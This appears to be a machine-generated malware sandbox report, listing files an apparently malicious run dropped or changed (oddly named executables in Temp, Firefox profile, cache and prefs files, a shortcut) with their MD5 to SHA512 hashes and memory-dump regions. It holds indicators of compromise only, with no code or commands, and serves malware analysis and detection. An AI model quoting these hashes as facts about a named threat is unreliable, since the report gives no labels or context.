C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe

MD5 655697ac09c74c41ed719736103c40e7
SHA1 7641ab00bfb93d90660aa44c91a2ac6a1518f134
SHA256 77cdb927f92b6d97a88f12fdbf7da51844fea64dfea67653e3a44a9759aba66d
SHA512 431f8ed6a81d954c045982b3e4653fa946e1e35839e6a83dbc4f572918af88514bfba29968f47e7a638d20bffdfb87402cf784deb43c94b7e73d944f66732c59

memory/4972-465-0x00000000001F0000-0x00000000008A3000-memory.dmp

memory/4972-473-0x00000000001F0000-0x00000000008A3000-memory.dmp

memory/2212-475-0x0000000000050000-0x0000000000348000-memory.dmp

memory/4904-481-0x0000000000D40000-0x0000000001049000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe

MD5 cf70eeed9e6093c83dc6338226d2fee9
SHA1 c854a8b3d9558541aeade0f01224fc7e8ad92fce
SHA256 d4a1f66f891ec93a587d6513b2365179c814e1d734c5b5bc7311301a676719e5
SHA512 c9796f73fd93e8ea960d1dcd834b5a89e2457ca519f6717ac715c09575237de6291a43786b9cc29e7b8f7ba216ae223ea09db0dff30b521c2eb26e8cd8ce2885

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\pending_pings\9a2ec262-9b5b-4cb3-8ee2-5e127c710b70

MD5 d59c6e42dd1ac7688e8b900333f2b1c3
SHA1 d1b693bdd484da1f8cd34d30e92719b7e92a5db7
SHA256 3a843da6d93d248e521c822a924111688ee4e130b61a434c0dcde4492b7d87ce
SHA512 79186879054ea2f0240407e95ba7a584f42b20db05b48735c8474b831bab182cf3416ba5704c1df271e701655bd1d93e23be32b2df0675f3a3f12bc8cfd30889

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 098e38abc691c26b052a34d541052a82
SHA1 8e2a7aeaee35fb6ae36d93f350230960dde6a5c9
SHA256 1ab56841c67f69380527cc6baa952f5e5e5fb29ddf7325652424b051b6bdeba4
SHA512 409d0654197893f4ffe3850115b031c1291105a7b3588446a335718f88bef1e77af2f444ed10d8ae3c4baf49719a1789ba7cd914ca88c41e02450309e74a7017

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\pending_pings\46e2021d-5103-430b-8511-2daebf94e384

MD5 6cbb30e0166a1f76dcb212edaf456bfe
SHA1 17fb08fa37720881546c1caa3449de7679771d59
SHA256 5014d01183d2215d80321d6d5bfcea025c89dc149b6af52cb6e0c88d0e35bb55
SHA512 dc2471fb5d91954e01f64dee7b7cd951b2789e41cafde15a0eb0006a8c7dffbca1bbf58da57556734054ce9be78a9d1e7e64b0246c43ea60b4e67cbf0c7f254d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 2899db646c514cc91916401e5492434f
SHA1 8831f1990e852a45e7e5a1743571a3e525681b63
SHA256 c9fdd166ec11b85e5d8fcb2e45135ece79d2724e1e2eff810ca9810236d48f46
SHA512 f973642b63cf080a677ee65d044874719079d5c14420a3edbd5818317fd1e7315ba74e6ff2560c96d0c88e5094bec8a820c2dd96e16ec5984bf016ddf05ecd62

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\AlternateServices.bin

MD5 82a16dcbecb2110ff29beabf1750fab5
SHA1 85b715479203126cda7213b26dd4fbf9bf2bf5d5
SHA256 305abaf34bb4f21d68338a40a0770cd89a21bd4597313f540101ad3a8731f01c
SHA512 a092a68e76f69b7e8570c65c81b628878b55ec8324f38c37078f4dca58809f397e4298c207263911ba6f94526e0f12c4b7874cc9791b5c7a8ae6e85f0ec909f3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs.js

MD5 850144c018eff92f07e5d99b0a7b30f8
SHA1 8ed6f1df9b4589de1cfcc2dcaacc0a4980e745f1
SHA256 5cb8c9a9815dc2f59122a38f3c99812a33e66cd47746bf5f3d385d811fcd2678
SHA512 3e91daa8892d6b9e0c069a24123015c8720b2ea2dfd8b1783c6719ff891a92610fe55ccffbf10afa655fd8aa9aa38f494d2f0f9501512b76f46a9160ca11ed60

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs.js

MD5 7ddffd2adba83fd683bda9ab45d757aa
SHA1 50dedf5865856d880eaa88a71c082c888e68c855
SHA256 57021c903108c2077ebc3725c1e81b60316d20f00f022a9f7c049a3c7a720a1a
SHA512 060757df8f9ed8a9fea277917633f7717c4006d63f9796e6c9d347fb49c3498ff650d4a07cc19fedc507067498f0a556ea86aa67c3341886bc1fadef00d91c7a

C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe

MD5 19525425361a89e2a13bfda00bce4f2f
SHA1 f766e61138d15675516f434e4fbfa7b27e49edbb
SHA256 79841400858b03959ccf05615db0d7e3d59f3bb80818e2547f9aa07afd2ad667
SHA512 cbde52614db36e058a560225856d32187739b0e2f741de9552c8c74ae4291de9c66d684cdc890d18c1e341dc5ed418dcdf9d52d4cb1a4ce498fffebcd1a8f28f

memory/2276-845-0x0000000000250000-0x00000000006AC000-memory.dmp

memory/2276-846-0x0000000000250000-0x00000000006AC000-memory.dmp

memory/2276-847-0x0000000000250000-0x00000000006AC000-memory.dmp

memory/2276-872-0x0000000000250000-0x00000000006AC000-memory.dmp

memory/2276-875-0x0000000000250000-0x00000000006AC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MGQ8IQ23\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\Desktop\YCL.lnk

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 5917cb5f4ff83241584f91fa851df323
SHA1 1cbd28f5d9123016e2155c03f846b3dda18cfbc5
SHA256 83f47699d65765ee5fddc952159fb2d686bfab868ca55a6e67b9cc3854f82126
SHA512 3572a200e36d01ff756989ef5ca326722346f7fe6e005ffac7f3318738c8b37a65aaca8248db10602c73abf4b33e3b6b9c4bd29e5faebc653306843d25bdb640

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\AlternateServices.bin

MD5 52c201c0b0ced0f0c3c117fda5ce6d7f
SHA1 a9ae4e9636bd447b27defa568881e845ee5c194d
SHA256 02909e7ced7d7c63993aedaa95ac1f6884908d5177759aa6f6ede23b5356f829
SHA512 d507c5216901634801a5264a596c675a4982702ec2b28c688ccdb0a2a54990d07e9feaa04a76b4153c21a59a889240a3b93697896a22d31831bc173f11530033

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs-1.js

MD5 fa166feb0f3da3b9855974a55dda3100
SHA1 41b4a4aad99bca7938a04e09d8b4f721cef06488
SHA256 2bc2e2fa5441da48f17f525ec70a5cb4555e4b1d1d2527fd83ccb103ea013d70
SHA512 0c04f3a77185dee9187de48a32ec48d1343407e47ad98ff2684fa1e19a457e0dadd92fbf09ae1dac55995765072938191ce17bea10340d69456e526d4a05ee02

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 0c068cd0f69e1d3d0208c1da1ee0e15c
SHA1 369d15394d5e19686aada59ecd72135e92f13240
SHA256 431a590a033bcc457de22d761c23f213fdae04ce3a7c9e0471fd502170ae6b79
SHA512 b9f99d7bba5bd5c4fab593673c99ad66f9ec8e4e925f8bb046baca8bde603ca5df40e00ad42d0450d06f615955f6803d27778299b94308f83871d7719fcae204

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs-1.js

MD5 76a90b8dcd3782db143eb4191e2686c5
SHA1 8b4f7c6134bbbc858e409e96a388fa93672f5fb3
SHA256 2cb2435291457d3164c7fd4c64b0f555b9c1be463e96425f6bdc4a81d49933b0
SHA512 0cf35a410cb3819a8c906e5a118bcd3815ef4c793afc19bee2d92bca549e01dcdd7825f50b7ab2357080b4af8365050d00b14e3ab5628c5afdf49b4d2993bcab